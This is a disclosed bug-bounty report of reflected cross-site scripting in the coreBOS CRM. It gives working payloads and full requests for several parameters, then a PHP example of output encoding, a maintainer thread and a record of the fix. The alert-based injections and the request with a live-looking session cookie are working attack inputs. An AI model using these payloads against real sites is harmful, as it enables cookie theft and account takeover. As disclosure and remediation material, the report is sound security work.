Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Dec 20th 2021


Description

coreBOS is vulnerable to Reflected Cross-Site Scripting in the advft_criteria_groups and advft_criteria parameters.

Payload

  • Outside the JSON object.
><script>alert(document.cookie)</script>
  • Inside the JSON object.
[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:Vqvl14><img src=a onerror=alert(1)>znemq","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}]

Request

GET /index.php?module=Documents&action=Popup&html=Popup_picker&forfield=gendoctemplateburr&srcmodule=evvtgendoc&forrecord=&form=&query=true&search=true&searchtype=advance&advft_criteria=[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}><script>alert(1)</script>&advft_criteria_groups=[null,{%22groupcondition%22:%22%22}]><script>alert(2)</script> HTTP/1.1
Host: demo.corebos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.corebos.com/index.php?action=index&module=evvtgendoc
Cookie: democoreboscom=8f928841548129a8317753f05afccd66; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=4101476105348538

Impact

This vulnerability is capable of stealing users' cookies and gaining full account takeover through their credentials.

Occurrences

Get Request:

  • parameter > type
https://demo.corebos.com/index.php?module=RecycleBin&action=RecycleBinAjax&file=index&mode=ajax&ajax=true&gname=&query=true&search_field=accountname&searchtype=BasicSearch&operator=s&type=alpbttb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k&search_text=Q&form=&forfield=&srcmodule=&forrecord=&selected_module=Accounts&__vt5rftk=sid:fb865148cbe7a0b1f0dd2c7a227b0c2c1a7d0667,1640278340&null=

Payload

Press SHIFT + ALT + X (the injected accesskey) to trigger the payload.

tb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k

Get Request:

  • parameter > reportmodule
https://demo.corebos.com/index.php?module=Reports&action=ReportsAjax&file=NewReport0&folder=13&reportmodule=Assetsacaco<script>alert(1)</script>kle7w&cbreporttype=directsq

Payload

Assetsacaco<script>alert(1)</script>kle7w
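The three reflections above differ by output context: `type` lands inside a double-quoted attribute (the `accesskey`/`onclick` payload closes the quote), `reportmodule` lands in element text, and `advft_criteria` is a JSON array with attacker text either appended after the closing `]` or hidden inside a field. The following is an added illustration, not coreBOS code or its actual fix; the surrounding HTML and the function names are assumptions, and the sample values are the report's own payloads.

```php
<?php
// Added illustration (not coreBOS code): the report's reflected values,
// echoed raw (vulnerable) versus handled correctly for their output context.

// Sample inputs constructed from the report's payloads.
$type          = 'tb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k';
$reportmodule  = 'Assetsacaco<script>alert(1)</script>kle7w';
$advftCriteria = '[{"groupid":"1","columnname":"vtiger_notes:template:template:'
               . 'Documents_Template:V","comparator":"e","value":"1",'
               . '"columncondition":"and"}]><script>alert(1)</script>';

// Vulnerable pattern: user input concatenated straight into an attribute value.
function renderTypeUnsafe(string $type): string {
    return '<input type="hidden" name="type" value="' . $type . '">';
}

// Hardened: encode for the attribute context. ENT_QUOTES turns the payload's
// double quotes into &quot;, so it can no longer close value="..." and add
// accesskey/onclick attributes of its own.
function renderTypeSafe(string $type): string {
    $enc = htmlspecialchars($type, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="type" value="' . $enc . '">';
}

// Hardened: element-text context; < and > become &lt; and &gt;.
function renderModuleSafe(string $module): string {
    $enc = htmlspecialchars($module, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>' . $enc . '</h2>';
}

// Hardened: require advft_criteria to be a well-formed JSON array and
// re-serialize it. Trailing text after "]" makes json_decode fail, so the
// "outside the JSON object" payload is rejected outright; JSON_HEX_* flags
// escape <, >, &, ', " inside fields (the "inside the JSON object" payload)
// so the serialized string is safe to embed in a <script> block. Any field
// later written as HTML still needs htmlspecialchars() at that point.
function normalizeCriteria(string $raw): ?string {
    $decoded = json_decode($raw, true);
    if (!is_array($decoded)) {
        return null;
    }
    return json_encode($decoded,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

echo renderTypeUnsafe($type), "\n";   // attribute breakout, onclick injected
echo renderTypeSafe($type), "\n";     // inert: quotes encoded as &quot;
echo renderModuleSafe($reportmodule), "\n";
var_dump(normalizeCriteria($advftCriteria)); // NULL: malformed JSON rejected
```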
We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
itsfading submitted a
5 months ago
itsfading modified the report
5 months ago
Joe Bordes
5 months ago

Maintainer


Hi @itsfading

Thank you so much for your effort. I really appreciate it. In coreBOS we do not use mysqli_real_escape_string; we use pquery instead:

$adb->pquery(SQL, array(of, parameters));

Can you change those?

itsfading
5 months ago

Researcher


Hi Joe, I think you are referring to the SQL Injection report, and it is not related to anything here, right? I am not quite aware of the syntax of pquery and cannot find documentation for it. Also, it seems you are using it correctly in some places but the vulnerability is still working; that's why I used mysqli_real_escape_string wherever you take the input from the user.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 5 months ago
itsfading modified the report
5 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 4 months ago
itsfading has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 8c1556 4 months ago
Joe Bordes has been awarded the fix bounty
NewReport0.php#L109-L131 has been validated
Save.php#L112-L116 has been validated
RecycleBinUtils.php#L41-L54 has been validated